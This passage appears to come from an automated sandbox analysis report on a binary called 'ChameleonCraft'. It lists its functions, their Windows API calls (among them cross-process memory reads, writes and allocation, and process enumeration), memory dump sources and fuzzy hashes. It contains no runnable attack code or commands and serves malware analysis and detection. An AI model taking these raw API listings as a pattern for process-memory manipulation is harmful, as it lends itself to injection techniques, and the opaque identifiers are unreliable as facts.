                                                          • Opcode Fuzzy Hash: ba3b9f8a1a0b135653ee14132364700fbb8616d6d2e6556cc585f0ad89606577
                                                          • Instruction Fuzzy Hash: 7C514375804349DFDF15EF68C880AFA7BA8EF96320F144059FD919B290C734AC82CB61
                                                          Function 009FA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00A01CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F9E4E,?,?,00000034,00000800,?,00000034), ref: 00A01CE5
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000,?,00000000,00000010,00000010,?,00000000), ref: 009FA3F7
                                                            • Part of subcall function 00A01C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00A01CB0
                                                            • Part of subcall function 00A01BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,009F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00A01C08
                                                            • Part of subcall function 00A01BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00A01C18
                                                            • Part of subcall function 00A01BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00A01C2E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 009FA464
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000000,?,00000010,?,00000000,?,00000010,?,00001104), ref: 009FA4B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: e38be489a38dd0a841af162cff123cce3e2578ac867c16880a66173dc17b5941
                                                          • Instruction ID: d9af72cccf621603788ad3d48bf613449d0a16912c9cefa25f49f988105261f2
                                                          • Opcode Fuzzy Hash: e38be489a38dd0a841af162cff123cce3e2578ac867c16880a66173dc17b5941
                                                          • Instruction Fuzzy Hash: D0413D7290021CBFDB10DBA4CD86AEEBBB8EF49300F004095FA55B7190DA70AE45CBA1
                                                          Function 00A281B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A2826F
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A2827D
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A28284
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 1edcf6c4f02abc21c4cc72a6992d9f518d622c3cc4379ef5fd63b00203494d94
                                                          • Instruction ID: f7673962333e9b8d58a9b79e345ac18c1ddc6b76d82a124093120958d4b6c8b9
                                                          • Opcode Fuzzy Hash: 1edcf6c4f02abc21c4cc72a6992d9f518d622c3cc4379ef5fd63b00203494d94
                                                          • Instruction Fuzzy Hash: DD2192B1604219AFDB00DF58DC85DAB37FDEB9A354B084159F91197251CB70EC51CBB0
                                                          Function 00A1C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,009E027A,?), ref: 00A1C6E7
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A1C6F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: 914dd239bd70e52db89f92fed3e7204b154970824af562ed5baebd75cba86a10
                                                          • Instruction ID: 1bdf6e36c0061c1ff1dcc56748e79119c1c952a0104ce2a98aefc10140db03c1
                                                          • Opcode Fuzzy Hash: 914dd239bd70e52db89f92fed3e7204b154970824af562ed5baebd75cba86a10
                                                          • Instruction Fuzzy Hash: 7DE0127D550712EFD7309B69CC59F9676D4FF06765B90882AF885D2290D7B0D8808F50
                                                          Function 009E0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 43beed81135eef7312158e5b0612c96d21f309615facb07491db86fe56f6e348
                                                          • Instruction ID: c6d89d8264203d64a6c38b57f583845b693c7b73ba84e0a7c86af22faa44d35c
                                                          • Opcode Fuzzy Hash: 43beed81135eef7312158e5b0612c96d21f309615facb07491db86fe56f6e348
                                                          • Instruction Fuzzy Hash: 40D0EC72814148EAC7169A92CC45EFAB37CBB88302F504852B506A2040D2798A88DB22
                                                          Function 009F814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A33C4C,?), ref: 009F8308
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A33C4C,?), ref: 009F8320
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00A30988,000000FF,?,00000000,00000800,00000000,?,00A33C4C,?), ref: 009F8345
                                                          • _memcmp.LIBCMT ref: 009F8366
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 313804b69cd9930d1a7aeb8e8ed0aaf0be067ffd0e03afacddde707aa31ab65f
                                                          • Instruction ID: 9722f1369c9d6b0b0bceff581031c51139c06af2d52bd2acb13d9a71a865efbb
                                                          • Opcode Fuzzy Hash: 313804b69cd9930d1a7aeb8e8ed0aaf0be067ffd0e03afacddde707aa31ab65f
                                                          • Instruction Fuzzy Hash: 0B810975A00109EFCB44DF94C988EEEB7B9FF89315F204598F516AB250DB71AE06CB60
                                                          Function 009FA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009FA68A
                                                          • __itow.LIBCMT ref: 009FA6BB
                                                            • Part of subcall function 009FA90B: SendMessageW.USER32(?,0000113E,00000000,00000000,?,00000000,00000028,00000800,?,00000028,?,?,?,00000000), ref: 009FA976
                                                          • SendMessageW.USER32(?,0000110A,00000001,?,?,0000110A,00000004,00000000), ref: 009FA724
                                                          • __itow.LIBCMT ref: 009FA77B
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: dc230c6842412c003942bf1e762b3b7263c44ba7b2ca0c88e05209d75960f1a0
                                                          • Instruction ID: 836081e5abe18902cfb8d7e39cc363a09bb63c6bacb2762ea234d1659cb7df56
                                                          • Opcode Fuzzy Hash: dc230c6842412c003942bf1e762b3b7263c44ba7b2ca0c88e05209d75960f1a0
                                                          • Instruction Fuzzy Hash: 684172B4A0020DABDF11EF54C956FFE7BB9EF84760F444019FA4993291DB709A44CB92
                                                          Function 009D63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009D642B
                                                          • __isleadbyte_l.LIBCMT ref: 009D6459
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009D6487
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009D64BD
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 7a6e5a6f0153989b260faec29814453d06f6776368f6739e89dbd21fc7ef8d5f
                                                          • Instruction ID: 12dcd6cd8c0fb61766f26d20be8ef611cc09111bcdcda6ef3a41345c091a6d52
                                                          • Opcode Fuzzy Hash: 7a6e5a6f0153989b260faec29814453d06f6776368f6739e89dbd21fc7ef8d5f
                                                          • Instruction Fuzzy Hash: 6E31B031644256AFDB218F65CC44BAB7BA9FF41320F15C52AF864872A1DB35E850DB50
                                                          Function 00A04148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A0416D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00A0417B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00A0419B
                                                          • CloseHandle.KERNEL32(00000000), ref: 00A04245
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 8eb36df13e76d4c18de78f936a8e1eedae37ddfa1a7070739901e480ffd8098a
                                                          • Instruction ID: 0b6b54d82bddfc744f6d588d3f9eefbe138384943e02c04d74f54ed962ef316b
                                                          • Opcode Fuzzy Hash: 8eb36df13e76d4c18de78f936a8e1eedae37ddfa1a7070739901e480ffd8098a
                                                          • Instruction Fuzzy Hash: F93171B11083459BD300EF90E895BEFBBE8BFD9350F40062DF585821E1EB719949CB52
                                                          Function 00A2634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC,00000001), ref: 00A263BD
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A263D7
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A263E5
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A263F3
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 358a3faf831d7d3e3566da08daa82dca96cdfa8a35dd3a35f2971027fb0e61b3
                                                          • Instruction ID: 2282d26322cc09f2d32f8f167889abd5c0e56b607cc30b0858e023c29092ecc2
                                                          • Opcode Fuzzy Hash: 358a3faf831d7d3e3566da08daa82dca96cdfa8a35dd3a35f2971027fb0e61b3
                                                          • Instruction Fuzzy Hash: 55119331306524AFDB04EB68DC55FBA77A9EF86320F144129F916CB2D1CBA0AD01CB95
                                                          Function 009FE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009FF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009FE46F,?,?,?,009FF262,00000000,000000EF,00000119,?,?), ref: 009FF867
                                                            • Part of subcall function 009FF858: lstrcpyW.KERNEL32(00000000,?,?,009FE46F,?,?,?,009FF262,00000000,000000EF,00000119,?,?,00000000), ref: 009FF88D
                                                            • Part of subcall function 009FF858: lstrcmpiW.KERNEL32(00000000,?,009FE46F,?,?,?,009FF262,00000000,000000EF,00000119,?,?), ref: 009FF8BE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009FF262,00000000,000000EF,00000119,?,?,00000000), ref: 009FE488
                                                          • lstrcpyW.KERNEL32(00000000,?,?,009FF262,00000000,000000EF,00000119,?,?,00000000), ref: 009FE4AE
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,009FF262,00000000,000000EF,00000119,?,?,00000000), ref: 009FE4E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: ad1d966d2bc9b651a684c85c4f7139e41e8a822332d37fc58e320ea77240e1a0
                                                          • Instruction ID: c50fd3e0b67dcbf26580e41d2a2d934379b24f72b05f6518ce8536c5feb7dbe3
                                                          • Opcode Fuzzy Hash: ad1d966d2bc9b651a684c85c4f7139e41e8a822332d37fc58e320ea77240e1a0
                                                          • Instruction Fuzzy Hash: B011D03A200349AFCB25AF74DC45E7A77B8FF86350B40402EFA06CB2A0EB719941C795
                                                          Function 00A04365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A04385
                                                          • _memset.LIBCMT ref: 00A043A6
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A043F8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00A04401
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 763a9770d11ebcb3915caf601cdd09f1d782f4fb3439c49417ee2d61b37a3c9b
                                                          • Instruction ID: d5ba56e7e2c47d40953414a9ab8f1b66bafa745d2d6e213bf939d0f4eaa6d178
                                                          • Opcode Fuzzy Hash: 763a9770d11ebcb3915caf601cdd09f1d782f4fb3439c49417ee2d61b37a3c9b
                                                          • Instruction Fuzzy Hash: 1011C4B190122C7AD7309BA5AC4DFEBBB7CEF45720F00469AF908E7190D2704E808BA4
                                                          Function 009A2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,009A2004), ref: 009A214F
                                                          • GetStockObject.GDI32(00000011,00000000,?,00000096,?,009A2004,?,?,static,00A30980,?,?,?,00000096,00000096,?), ref: 009A2163
                                                          • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,009A2004,?,?,static,00A30980,?,?,?,00000096,00000096), ref: 009A216D
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 3eee3d5765b1fad7ae667fc85984ff37973cb24935e9507b5055bcd3128189c8
                                                          • Instruction ID: 8bf8f03fa844fde4259d14f7c1f0115c12c3084d90edd41c492cb05c116866f5
                                                          • Opcode Fuzzy Hash: 3eee3d5765b1fad7ae667fc85984ff37973cb24935e9507b5055bcd3128189c8
                                                          • Instruction Fuzzy Hash: 65118B72105509BFDB028F949C55EEB7B6DEF59354F050112FA0452110C7319C61AFE0
                                                          Function 00A2E1CE Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A2E1EA
                                                          • #183.OLEAUT32(?,00000002,0000000C), ref: 00A2E201
                                                          • #163.OLEAUT32(0000000C,?,00000000), ref: 00A2E216
                                                          • #442.OLEAUT32(0000000C,?,00000000), ref: 00A2E234
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: #163#183#442FileModuleName
                                                          • String ID:
                                                          • API String ID: 2875472535-0
                                                          • Opcode ID: 3a254ffae160d1e8ef66cc37f1a68181c3d827f5745482b109cf60907b8c43de
                                                          • Instruction ID: 8a9a01e43753d8103c9b9ee503258840e5a69a5266dbe12d50d6f1a281b058ef
                                                          • Opcode Fuzzy Hash: 3a254ffae160d1e8ef66cc37f1a68181c3d827f5745482b109cf60907b8c43de
                                                          • Instruction Fuzzy Hash: 541161B5205324DBEB30CF99ED09FD3BBBCEB00B00F108569A617D6450D7B0E5449BA1
                                                          Function 00A2C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009A1729
                                                            • Part of subcall function 009A16CF: SelectObject.GDI32(?,00000000), ref: 009A1738
                                                            • Part of subcall function 009A16CF: BeginPath.GDI32(?), ref: 009A174F
                                                            • Part of subcall function 009A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 009A1778
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000,00000000,00000000,000000FF,00000002,00000001,?,?,00A2C4C0,00000000,?,00000008,00000000), ref: 00A2C3E8
                                                          • LineTo.GDI32(00000000,?,?,?,00A2C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00A2C3F5
                                                          • EndPath.GDI32(00000000,?,00A2C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00A2C405
                                                          • StrokePath.GDI32(00000000,?,00A2C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00A2C413
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
